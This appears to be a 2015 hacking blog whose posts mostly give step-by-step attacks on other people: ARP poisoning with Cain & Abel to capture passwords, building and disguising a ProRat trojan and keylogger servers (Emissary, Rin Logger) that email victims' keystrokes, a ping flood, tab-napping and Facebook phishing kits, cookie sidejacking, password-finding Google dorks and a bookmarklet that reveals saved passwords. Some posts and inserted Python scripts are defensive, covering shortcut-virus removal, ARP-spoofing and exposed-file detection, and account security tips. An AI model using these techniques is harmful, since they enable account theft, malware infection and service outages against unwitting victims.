Tuesday, 11 August 2015

Kali Linux 2.0 Release Day Scheduled

We’ve been awfully quiet lately, which usually means something is brewing below the surface. In the past few months we’ve been working feverishly on our next generation of Kali Linux and we’re really happy with how it’s looking so far. There are a lot of new features and interesting new aspects to this updated version; however, we’ll keep our mouths shut until we’re done with the release. We won’t leave you completely hanging though… here’s a small teaser of things to come!

Kali 2.0 Teaser – Kali Sana! from Offensive Security

Kali 2.0 Dojo at Black Hat & DEF CON Las Vegas, 2015
If you’re heading down to Black Hat Vegas 2015, join our free Kali 2.0 Dojo workshop, where we will be showcasing some of the most awesome features in Kali 2.0. We are currently working to bring everyone a surprise appearance at DEF CON as well. Unleash the Kraken!

Saturday, 16 May 2015

How to Remove Shortcut Virus From Pendrive / USB Drive

If your USB drive doesn’t hold important files you can simply format it. If it does contain important files, don’t format it; follow the steps below to remove the shortcut virus instead.
Step 1. Go to Start and search for cmd. When it appears in the Start menu, right-click it and click “Run as Administrator”.
Step 2. Navigate to the flash drive by typing its letter. To find your USB drive letter, open “My Computer” and check the letter. If it is i, for example, type i: and hit Enter.
Step 3. Type “del *.lnk” (without quotes) in the cmd window and hit Enter on your keyboard.
Step 4. Now type “attrib -s -r -h *.* /s /d /l” (without quotes) and hit Enter. This clears the system, read-only and hidden attributes on the files and folders of the drive.

It will take a few seconds to recover all your files. Now open your flash drive and you will get back all of your files.
Once the files on the USB drive are recovered you can use them, but if you plug the flash drive into an infected computer again it will be infected again. So it is better to remove the source of this virus, i.e. the infected computer. Follow the steps below to remove the shortcut virus from the computer.
Step 1. First open Task Manager by pressing Ctrl + Alt + Del, or right-click on the taskbar and click Task Manager.
Step 2. Go to the Processes tab and look for the process Wscript.exe. Scroll down to find any such process, then right-click it and click End Task.
Step 3. Now go to Start and search for “regedit”. Open it to get the Registry Editor and navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Here look for the registry key “XYZ name”. If found, right-click it and delete this registry key. This will remove the shortcut virus from your computer; if not, try these steps.

1. Press the Windows + R keys to get the Run box, type %temp% and hit OK. The temp folder will open; look for a file named xyz.vbs or xyz.exe, or any kind of script, and delete it.

2. Go to C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. Check the Startup folder; if xyz.vbs exists here, delete it.
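
The registry check in Step 3 can be scripted instead of eyeballed. The following is an added example, not part of the original post: it parses the text that `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints and flags values that start Windows Script Host or a script file. The sample output, value names, user name and paths are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output for the Run key named in Step 3.
# Value names, the user name and all paths are made up for this example.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    xyz    REG_SZ    wscript.exe //B "C:\Users\alice\AppData\Local\Temp\xyz.vbs"
    Helper    REG_EXPAND_SZ    %APPDATA%\helper.vbe
"""

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")
SCRIPT_HOST = re.compile(r"\b[wc]script(\.exe)?\b", re.IGNORECASE)
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
# Folders any user process can write to, including the temp folder from the post.
USER_WRITABLE = ("\\appdata\\", "%appdata%", "%temp%", "\\temp\\")


def parse_reg_query(text):
    """Return [(value_name, command)] for the string values in the output."""
    entries = []
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match and match.group("type") in ("REG_SZ", "REG_EXPAND_SZ"):
            entries.append((match.group("name"), match.group("data").strip()))
    return entries


def suspicious_autoruns(text):
    """Return [(name, command, reasons)] for autoruns that involve scripts."""
    flagged = []
    for name, command in parse_reg_query(text):
        reasons = []
        if SCRIPT_HOST.search(command):
            reasons.append("starts Windows Script Host")
        if SCRIPT_FILE.search(command):
            reasons.append("runs a script file")
        # A user-writable path alone is normal for per-user software, so it
        # only counts as an extra indicator once a script is involved.
        if reasons and any(p in command.lower() for p in USER_WRITABLE):
            reasons.append("script lives in a user-writable folder")
        if reasons:
            flagged.append((name, command, reasons))
    return flagged


if __name__ == "__main__":
    for name, command, reasons in suspicious_autoruns(SAMPLE_REG_QUERY):
        print(f"{name}: {command}\n    -> {', '.join(reasons)}")
```

Review each flagged value before deleting it; some legitimate software also starts scripts at logon.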


Thursday, 22 January 2015

Trace Your Facebook Profile Visitors

To know who recently visited your profile.

Step 1) Go to your Facebook Profile Page.

Step 2) Now press Ctrl + U on your keyboard to see the source code of your profile page.

Step 3) Now press Ctrl + F from your keyboard to open search box.

Step 4) Now search this code {"list":

Step 5) You will find some Facebook Profile IDs, like those shown below.

Step 6) These are the Facebook Profile IDs of your friends who visited recently.

Step 7) The first IDs are the ones that visited the most number of times.

Step 8) Now, if you want to find out, open a new tab and enter the link below:

www.facebook.com/Facebook Profile Id

For Example : www.facebook.com/--------59

Monday, 19 January 2015

Cain & Abel

You are now ready to use the sniffer to get the passwords of the people who are on the same network as you. This is unbelievably simple and also warns us of the dangers we are prone to while we are on a network.

Make sure that you've configured Cain before moving on to read this article. If you still haven't configured it, look at the links at the bottom of this article.

So here is what you have to do:

1)Open Cain and first of all click on the 'Start sniffer' button in the right top corner of your screen beside the radioactivity sign button. Don't worry you're just activating the sniffer.

2)Now click on the sniffer tab. It should be blank if you're using it for the first time.

3)Right click and select 'Scan for MAC addresses' and without touching anything click OK.

4)Now you have a list of IP addresses and MAC addresses on your network.

5)Now click on 'APR' tab at the bottom beside the 'hosts' tab.

6)The function of APR is to Hijack the network traffic and pass it through your computer.

7)Now single click in the upper segment of the empty form-like space on the right side of the window.

8)Click on the blue PLUS sign (+) on the top which is meant to add new addresses to poison and sniff.

9)Here, on the left side you have a list of available addresses. I prefer selecting the address of the router so select the address of the router and then on the right side select the addresses of the computers you want to sniff. You can choose as many computers as you like.

10)Now just click okay and you'll see that address listed in the upper segment of your screen.

11)Select the addresses with your mouse and click on the 'Start APR' button which appears like a radioactivity sign.

12)Bingo! You just started sniffing and poisoning the network.

13)Now click on the 'Passwords' tab at the bottom and here you have a list of all the activity going on and you can sneak the passwords from here.

14)For web passwords see the HTTP tab and if you want the login information just click on 'SMB' on the left side of your screen where there is a list of the type of passwords available.

15)From here, select the password you want to crack, right click it and send it to the cracker.
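
Seen from the machines being sniffed, APR leaves a visible trace: the router's IP address resolves to the MAC address of the sniffing computer, so two IP addresses share one MAC in the ARP table. The following is an added example, not part of the original post, that checks `arp -a` output for that condition; the sample table and all addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output from a Windows host whose gateway entry has
# been replaced. All IP and MAC addresses are made up for this example.
SAMPLE_ARP = """
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.42          00-11-22-33-44-55     dynamic
  192.168.1.50          66-77-88-99-aa-bb     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ENTRY = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>[0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+\w+"
)


def normalise_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} for the unicast entries of an `arp -a` listing."""
    table = {}
    for line in text.splitlines():
        match = ENTRY.match(line)
        if not match:
            continue
        mac = normalise_mac(match.group("mac"))
        # Broadcast and multicast MACs have the lowest bit of the first
        # octet set; many IPs legitimately map to them, so skip those.
        if int(mac[:2], 16) & 1:
            continue
        table[match.group("ip")] = mac
    return table


def find_arp_anomalies(text, gateway_ip, known_gateway_mac=None):
    """Report MACs claimed by several IPs and a changed gateway MAC."""
    table = parse_arp_table(text)
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    shared = {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}
    gateway_mac = table.get(gateway_ip)
    changed = (
        known_gateway_mac is not None
        and gateway_mac is not None
        and gateway_mac != normalise_mac(known_gateway_mac)
    )
    return {
        "shared_macs": shared,
        "gateway_mac": gateway_mac,
        "gateway_shares_mac": any(gateway_ip in ips for ips in shared.values()),
        "gateway_mac_changed": changed,
    }


if __name__ == "__main__":
    # The baseline MAC would be recorded while the network is known to be clean.
    print(find_arp_anomalies(SAMPLE_ARP, "192.168.1.1", "00-aa-bb-cc-dd-ee"))
```

A shared MAC is not always an attack (proxy ARP and multi-homed hosts produce it too), so the gateway comparison against a recorded baseline is the stronger signal.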


Saturday, 17 January 2015

Hack Remote PC Using Prorat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password "pro".

STEP 2. Open up the program and You should see the following window.

STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow.It automatically fills your IP address. Next put in your e-mail so that when and if a victim gets infected it will send you an email.

STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.

STEP 6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.

STEP 7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files.

STEP 8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.

STEP 9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.

STEP 10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.


Thursday, 15 January 2015

DDOS Attack Manually

Open Cmd From Run => Cmd
Now Follow These Steps -:

1. Now Type This Command In CMD :

Ping www.anysite.com

And You Will Get The I.P of Victim

2. Now Type =>

ping (i.p of site) –t –l 65000

here 65000 is packets


Now Your PC Will Send A Huge Traffic To That Site…:D

Check That Site After 1 Hours it will be Down..!!!

Try This From More PC For A Good Response..!!!


Wednesday, 14 January 2015

DDOS Attack Basic Tutorial

What is DoS Attack ?
A Denial of Service (DoS) attack is a fatal attempt by an external agent to cause a situation where the actual resource (the victim undergoing attack) becomes unavailable to its actual visitors or users. This is usually done by overwhelming the target victim with illegitimate traffic in the form of broken/unsolicited page access requests.

A Distributed Denial of Service (DDoS) attack is an advanced form of DoS where the attacking agents are distributed over a huge network (or the internet).

How DoS Attacks are executed ?
DoS attacks are usually executed by flooding the target servers with unsolicited data packets in an unprecedented manner. This may be done by misconfiguring network routers or by performing a smurf attack on the victim servers. This results in 'Capacity Overflow', followed by max-out of system resources, which makes the target service unavailable to the intended users, either temporarily or permanently (in the case of a hardware-targeted DoS attack).
In the case of a DDoS attack, the origins of the unsolicited data packets (sent to flood the bandwidth/resources of the victim servers) are distributed over a large network (or the internet).
The overall mechanism of DDoS Attack involves a huge quantity of compromised network nodes (computers connected to internet), governed by agent handlers, which are further controlled centrally by the actual attacker.

The massive number of compromised computers on the internet are then unknowingly governed by the source attacker to demand access to the targeted victim within a minimal time span, which further causes saturation of limited system resources and results in eventual shutdown of the targeted service.

The most common method employed to compromise a massive number of user agents on the internet (to actually execute a DDoS attack) is to plague as many computers as possible with malware/trojans meant for that particular purpose. Such trojans can spread either via email attachments or via peer-to-peer networks. Whatever the method of spreading, once the intended trojan is silently installed on the uninformed computer agent, that user agent has actually been compromised and is then called a Zombie or Botnet.

Further, it becomes the prerogative of the source attacker to indirectly command some or all of its Zombie agents (or botnets) to demand access to the target service.

What are other variants of DoS attacks ?
There are many other attacks of similar nature and purpose such as smurf attack, nuke bomb, ping of death, banana attack, phlashing among many others.

How are they counteracted ?
The best way to defend a web service from faltering due to DDoS attack is to keep backup resources of the system intact. As the aim of such attack is to max out system resources, if the system resources are already abundant and well prepared to face that sudden peak of traffic at any moment, most chances are that your web service will survive DoS (or even DDoS) attack.

What implications can DDoS Attacks have ?
If the attack is limited to overwhelming, resource-consuming traffic, the implications are limited to service unavailability for a couple of hours (or a few days in exceptional cases). This not only stresses the website administrators financially but also results in loss of market reputation and puts a question mark on the reliability of the web service.

In the case of hardware-targeted DoS attacks, financial losses can magnify to a great extent, as hosting infrastructure has to be replaced on an urgent basis. This can also lead to critical data loss if backup procedures aren't up to the mark. With more and more DDoS attacks happening these days, companies and Internet properties are using various types of DDoS mitigation strategies to avoid any worst-case scenario.


Tuesday, 13 January 2015

Ping

Ping uses ICMP (Internet Control Message Protocol), which is used to troubleshoot TCP/IP networks. So, ping is basically a command that allows you to check whether a host is alive or not.
To ping a particular host the syntax is (at the command prompt):

C:\>ping hostname.com

Example: C:\>ping www.google.com

The various options of the ping command and their usage can be viewed by just typing C:\>ping at the command prompt.


Monday, 12 January 2015

Set up Your own Hacking Lab

There is an open source project, Damn Vulnerable Web App (DVWA). DVWA is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. Now you need an XAMPP server to install this application.

Installing XAMPP Server

=> Download the XAMPP server
=> Locate the installed folder and go to htdocs.

=> Now extract the contents of the downloaded file to the htdocs folder.
=> Open any browser and type localhost/foldername



Set up DVWA:

A log in screen will appear.
Log in with username as "admin" and password as "password".

After that you will be greeted with its home page

Now you know what to do: hack. Select the security level and try different attacks. It offers the following attacks:
* Brute Force
* Command Execution
* CSRF
* Insecure Captcha
* File Inclusion
* SQL Injection
* Blind SQL Injection
* XSS Stored
* XSS Reflected


Sunday, 11 January 2015

Tips To Secure Your Facebook Account

If you are on Facebook and use it for business purposes, you know how important your Facebook account is. You must be alert to the hackers who are consistently trying to hack Facebook accounts. They use various black hat methods to get access to your account. When they succeed, they post spam on your Wall, which may bring down your reputation or make your profile look spammy. You may have read the stories titled French President’s Facebook Page Hacked and Facebook Pulls CEO’s Page After Apparent Hacking. But you can secure your Facebook profile by following some dos and don’ts so that they can’t get any scope to set a trap for you. Here are some actions that you must take for your security and stability on Facebook.

Remove the Facebook Apps that you don’t trust

When you give an application permission to access your data, it hangs on to that permission forever. So you are in the danger zone if you do not know much about the trustworthiness of the application. But sometimes we allow applications to access our profile data for some instant benefit without knowing about them, and we are pretty lazy about removing the useless applications.

Some hackers take a long-term view: they create some juicy applications and attract you to install them in your Facebook account. Later, they can use the permission you gave to hack your account. So you must revoke the permissions of those apps that you no longer need or don’t trust. Learn how to delete the permissions that you previously allowed to an application in your Facebook account from this video tutorial.

Enable SSL Settings for your Facebook account to be safe from Firesheep

In late 2010 a developer, Codebutler, released a Firefox add-on named Firesheep that uses the security cookies websites rely on for login verification. You should be careful about this, as the add-on takes advantage of a security flaw on Wi-Fi networks. Hackers can use this add-on to grab your login cookies on a wireless network. So you must use an SSL connection (https) when accessing your Facebook account over a Wi-Fi connection. To enable SSL for your Facebook account, log in and click on the Account link at the top-right corner of the page. Then click on the Account settings link in the drop-down menu.

Under the Settings tab scroll down to the Account security row and click on the Change link. Tick the Browse Facebook on a secure connection (https) whenever possible check box and then click the Save button. Now whenever you browse Facebook it will use the SSL (https) connection protocol.

Set up Facebook Login Email Alerts

If somebody manages to get your login information, you should take prompt action, like changing your login password. So to be notified when anybody logs in to your account, set up Facebook login email alerts.

Protect your information and privacy on Facebook

Hackers are very intelligent and try to crack your password by collecting information about you from your Facebook account. So you must protect your information and secure your privacy on Facebook so that you are not hacked one day.


Saturday, 10 January 2015

Facebook Password Decryptor

FacebookPasswordDecryptor is FREE software to instantly recover Facebook account passwords stored by popular web browsers and messengers. Most of these applications store login passwords to spare the user the hassle of entering the password every time. Often these applications use their own proprietary encryption mechanism to store the login passwords, including Facebook account passwords. FacebookPasswordDecryptor automatically crawls through each of these applications and instantly recovers the encrypted Facebook account password.


Friday, 9 January 2015

Tab Napping

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube, google etc and came back to your website then your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you. So lets see how to hack facebook account using tab napping trick.

Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website : www.000webhost.com www.host1free.com www.my3gb.com or you can search on google and create an account.

2) Now download the script and phishing pages from google.

3) Extract it and you will see the files and folders may be like below :

4) Upload all the files and folders to your website.
5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it. The website look like this:
Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue,
then enjoy :-)


Thursday, 8 January 2015

Cookie Stealing

What Are Cookies? And What Is The Use Of Stealing Cookies?

Cookies are small files that are stored on a user's computer by websites when the user visits them. The stored cookies are used by the web server to identify and authenticate the user. For example, when a user logs in to Facebook a unique string is generated; one copy of it is saved on the server and the other is saved in the user's browser as a cookie. Both are matched every time the user does anything in his account. So if we steal the victim's cookie and inject it into our browser, we will be able to imitate the victim's identity to the web server and thus be able to log in to his account. This is called sidejacking. The best thing about this is that we need not know the victim's ID or password; all we need is the victim's cookie.

Hack Facebook / Twitter By Stealing Cookies

Things we need :-
1. Ettercap or Cain & Abel for ARP poisoning the victim
2. Wireshark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add-on for injecting the stolen cookies in our browser

Procedure :


1. First ARP poison the victim .
2. After ARP poisoning open Wire shark ,click capture button from the menu bar ,then select interface .Now select your interface (usually eth0 ) finally click start capture .
3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),
4. Mean while Find the IP address of Facebook ,for this you can open CMD (command prompt ) and enter .Ping Facebook.com to find its IP address

5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php and copy all the cookie names and values in a note pad as shown

7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookie values and save them as shown
8. Now open Facebook in a new tab , you will be logged in the victims account .
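
The capture in step 6 only works when the session cookie travels over plain HTTP, which is also why the earlier post on securing a Facebook account says to browse over SSL (https). The following is an added example, not part of the original post, showing how a site owner can audit a login response for cookies that would be exposed this way; the header values, cookie names and the name-based session heuristic are assumptions made for illustration.

```python
# Constructed response headers from a login endpoint. Cookie names and
# values are made up for this example.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "session_id=3f9a0c; Path=/; HttpOnly"),
    ("Set-Cookie", "auth_token=b71e55; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "lang=en; Path=/; Max-Age=31536000"),
]

# Assumption: cookies whose names contain one of these substrings carry
# the login session. Adjust the list to the application being audited.
SESSION_HINTS = ("sess", "auth", "token", "sid", "login")

PROBLEMS = {
    "missing-secure": "cookie is also sent over http://, where a sniffer "
                      "on the same network can read it",
    "missing-httponly": "cookie can be read by scripts running in the page",
    "missing-hsts": "response does not tell the browser to use https:// only",
}


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie_name, {attribute: value})."""
    first, *rest = [part.strip() for part in value.split(";")]
    name, _, _ = first.partition("=")
    attrs = {}
    for part in rest:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), attrs


def audit_cookies(headers):
    """Return [(subject, problem_code)] for session cookies at risk."""
    findings = []
    has_hsts = False
    for header, value in headers:
        header = header.lower()
        if header == "strict-transport-security":
            has_hsts = True
        if header != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        if not any(hint in name.lower() for hint in SESSION_HINTS):
            continue  # preference cookies such as "lang" are not the target
        if "secure" not in attrs:
            findings.append((name, "missing-secure"))
        if "httponly" not in attrs:
            findings.append((name, "missing-httponly"))
    if not has_hsts:
        findings.append(("(response)", "missing-hsts"))
    return findings


if __name__ == "__main__":
    for subject, code in audit_cookies(SAMPLE_HEADERS):
        print(f"{subject}: {code} ({PROBLEMS[code]})")
```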


Wednesday, 7 January 2015

Hacking FB Account Using Google Dork List

Prerequisites: (This one is Easy!)

1. A modern webbrowser and a internet.

2. Time

[Level:Beginner]

Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test= email= default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wpcontent/ backup-*

Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users.The Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage! This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage-"

Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork:"inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords....

Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd
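
Every dork above finds a file that an administrator left inside a publicly served folder. The following is an added example, not part of the original post, that a site owner can run against their own web root to find the same kinds of files before a search engine indexes them; the rule list is derived from the file names in the dorks above, and the SQL backup rule is generalised to any folder.

```python
import os
import re
import sys

# File patterns taken from the dorks listed above, matched against the
# path relative to the web root (written with a leading "/").
PATH_RULES = [
    (re.compile(r"/wwwboard/passwd\.txt$", re.I), "WWWBoard password file"),
    (re.compile(r"\.pwd$", re.I), "FrontPage password file"),
    (re.compile(r"/config/databases\.yml$", re.I), "Symfony database config"),
    (re.compile(r"/server\.dbs$", re.I), "TeamSpeak server database"),
    (re.compile(r"/server\.log$", re.I), "TeamSpeak server log"),
    (re.compile(r"/backup-[^/]*\.sql$", re.I), "SQL backup file"),
    (re.compile(r"/passwd$", re.I), "passwd file"),
]


def contains_private_key(path, limit=65536):
    """True if the first `limit` bytes hold a PEM private key header."""
    try:
        with open(path, "rb") as handle:
            return b"PRIVATE KEY-----" in handle.read(limit)
    except OSError:
        return False


def find_exposed(web_root):
    """Return sorted [(relative_path, reason)] for risky files under web_root."""
    findings = []
    for folder, _dirs, files in os.walk(web_root):
        for filename in files:
            full = os.path.join(folder, filename)
            rel = "/" + os.path.relpath(full, web_root).replace(os.sep, "/")
            for pattern, reason in PATH_RULES:
                if pattern.search(rel):
                    findings.append((rel, reason))
                    break
            else:
                # .pem files are only a problem when they hold a private
                # key; certificates are meant to be public.
                if rel.lower().endswith(".pem") and contains_private_key(full):
                    findings.append((rel, "PEM file containing a private key"))
    return sorted(findings)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, reason in find_exposed(root):
        print(f"{rel}: {reason}")
```

Anything it reports should be moved out of the served folder or blocked in the web server configuration, and any credentials in it changed.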


Tuesday, 6 January 2015

keylogger

1. first you must have the emissary keylogger in your system. and Net Framework installed because keyloggers wont work without this.
2. Then you have to create fake account at google. its use is this when you hack a person his data will be mailed to your account.
3. when you do these too.Now open the the Emissary Keylogger.
4. their you can see Gmail User Name. and below it Gmail Password. Put the gmail account with password their because this will confirm itself that the mails have to sent for this account or not..
5.when you put their you can see Test Mail.. just click on it . it will be blink for a minute and then a window will appear and saying "Message has sent. Check your mail." then check your mail is their a message received from the emissary. if not then try again because you have entered the pass or id wrong.
6. After it below you can see Server Name in the bracket will be written "sever.exe" well you can change the name like Nav.exe..NOTe you can only change server but not .exe e.g.. Nav.exe.
7. Below that is Interval .. IT means that what you want in how much minutes the mail come to you from the victims pc. i like to give it because this is good.
8. At the End you can see Build Server. just click on it and i file will appear at your system by then name you have given in server name . and it will be at the same directory where the emissary keylogger is..
9. NOW the file is created with you.. Give that file to the victim who you want to hack If he opens it then he will be hacked..
10. If you are worried how can i gave them . Then post it to the free web hosting space like www.mediafire.com


Monday, 5 January 2015

Phising

The Oldest and Successful Method

First of all download the Facebook Phishing Page. Click Here Extract the zip file now you will get three files as given below:

    * index.html
    * log.txt
    * login.php

Upload all the three files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself.

http://www.yourfreehosting.net/
http://www.esmartstart.com/

Once you have uploaded all the three files to web hosting server now you have to send these to your victim. Now After sending Phisher to victim, once the user logs in to his Facebook account using your Phisher, his user ID and password are ours...And these are stored in passes.txt what you have to do is just refresh your Web hosting account files.


Sunday, 4 January 2015

Tips To Secure Your Gmail Account

It's simple. Currently, when you want to log in to any of your Google accounts you use just a username and password, and if someone captures your password your account can be compromised/blocked. So Google said that before you can log in to your account you will have to provide your username, password and, additionally, a verification code sent to your phone. That way a person who knows only your password cannot open your account; they will also need the verification code every time they want to get access to your account!

Follow the easy 9 steps with the pictures included below !!!

Step 1:

Click on settings

Step 2:

Select Accounts and Import, and then select Other Google Account settings

Step 3:

Select 2-step verification

Step 4 :

Click on the button to set up 2-step verification

Step 5 :

Select the appropriate options, such as other (use another phone) and country, enter your cellphone number and select the SMS text message option

Step 6:

Click on Send code and you will receive the verification code on your phone number. Enter that code in the box provided and click Verify. Once verified, click Next

Step 7 :

Copy the backup codes displayed on the screen and save them safely! These codes can be used instead of the verification code if the Google server or your phone provider delays delivery of the verification code when you log in to your Google account. Once done, proceed to the next step

Step 8 :

Follow the instructions on the screen to add a back-up phone if you have one (or use a family member's / friend's number) that you can use in case your primary contact has any problem

Step 9 :

Click on Turn-on 2 step verification.


Saturday, 3 January 2015

Gmail hacking by Google Password Decryptor

GooglePasswordDecryptor is a FREE tool to instantly recover Google account passwords stored by various Google applications as well as popular web browsers. Most of Google's desktop applications, such as GTalk, Picasa etc., store the Google account password to spare the user the hassle of entering it every time.


Friday, 2 January 2015

How To View Password Behind *****

You can use this script when someone has ticked the remember me box in the login form of a website, to reveal the password behind the saved asterisks or encrypted password.
After opening the web page, paste the JavaScript given below into the address bar and hit Enter.

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j %20{%20f%20=%20F[j];%20for%20(i=0;%20i %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20page:\n\n%22%20+%20s);
%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this%20page.%22);})();


Thursday, 1 January 2015

Keylogger

Step 1) First Download Rin Logger Run the keylogger file on your pc and click on “Create new”

Step 2) Now, enter the information as follows:
Email address: your email address (gmail recommended) Account Password: Password of your Email address. Keylogger Recipients: Enter your Email address Click on next
Step 3) Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs.
After that hit "verify now” If you get a message saying verified, your good to go, click next
Step 4) Now enable the “Install Keylogger” by clicking on it. Name the file anything you want and select Installation path as “Application Data”,
Step 5) Click on Next
Step 6) Now, “Enable Website Viewer” by clicking on it. Click on Next option
Step 7)Now, Enable the “Enable File Binder”. Click on next.
Step 8) Now Enable the “Steal Password” Click on Next
Step 9) Fill all the information by yourself. And click on next.
Step 10) Now, hit on “Save As” and select the location where you want to save your keylogger server file. And click on “Compile Server”. Now Compile has been done.
You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.